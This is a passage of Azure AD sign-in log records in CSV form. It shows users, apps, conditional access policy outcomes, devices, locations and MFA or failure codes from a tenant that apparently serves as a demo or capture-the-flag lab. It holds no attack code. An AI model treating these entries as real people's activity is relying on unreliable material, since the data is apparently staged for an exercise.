{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:30,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",037faf71-efb6-4984-8ebb-22635f996100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,037faf71-efb6-4984-8ebb-22635f996100,SigninLogs,Sucess,40.75891113,-73.97901917
+714,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:17.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",4d916265-6489-4572-bed8-5861122d1600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4d916265-6489-4572-bed8-5861122d1600,SigninLogs,Sucess,50.6406517,5.572050095
+715,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:02.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,b5b1cf6c-ca8d-40b0-9bfc-a8a3cf1f024a,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5511ead1-bd0f-42e2-a2c1-d74a4f571600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -96.76923370361328, 'latitude': 33.16151809692383}, 'state': 'Texas', 'city': 'Frisco'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5511ead1-bd0f-42e2-a2c1-d74a4f571600,SigninLogs,Failed,33.1615181,-96.7692337
+716,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:02.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,40f1ee85-8494-4fa8-82b6-1ad652d998de,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",2b6dd05c-6ab3-47f4-b023-40d0ae661300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,2b6dd05c-6ab3-47f4-b023-40d0ae661300,SigninLogs,Sucess,33.7984581,-84.38828278
+717,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:02.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,328de089-b169-451d-b991-b5071fef8050,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c883e3df-3efa-4676-93e1-2d97526c1600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,c883e3df-3efa-4676-93e1-2d97526c1600,SigninLogs,Sucess,50.6406517,5.572050095
+718,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:03.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,15f5cb55-8e4e-4ca8-ac2e-85ad97d78253,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c883e3df-3efa-4676-93e1-2d979f6c1600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,c883e3df-3efa-4676-93e1-2d979f6c1600,SigninLogs,Sucess,50.6406517,5.572050095
+719,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:14.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,650052,None,Other,0,1523c6b1-460e-4bf0-b7cd-bf0f3b2fa1f8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Modern Workplace Tools,fe6aa35b-7da8-44fd-a44e-e2d4bafbdab5,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",23877b62-2023-4ce4-9fb4-bf65e3b51300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 650052, 'failureReason': 'Other'}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,23877b62-2023-4ce4-9fb4-bf65e3b51300,SigninLogs,Failed,33.7984581,-84.38828278
+720,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:22.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 14:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",4d916265-6489-4572-bed8-58614f4b1600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4d916265-6489-4572-bed8-58614f4b1600,SigninLogs,Sucess,50.6406517,5.572050095
+721,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:51.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2a47fe57-716e-4e88-aacc-db60994bd51f,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 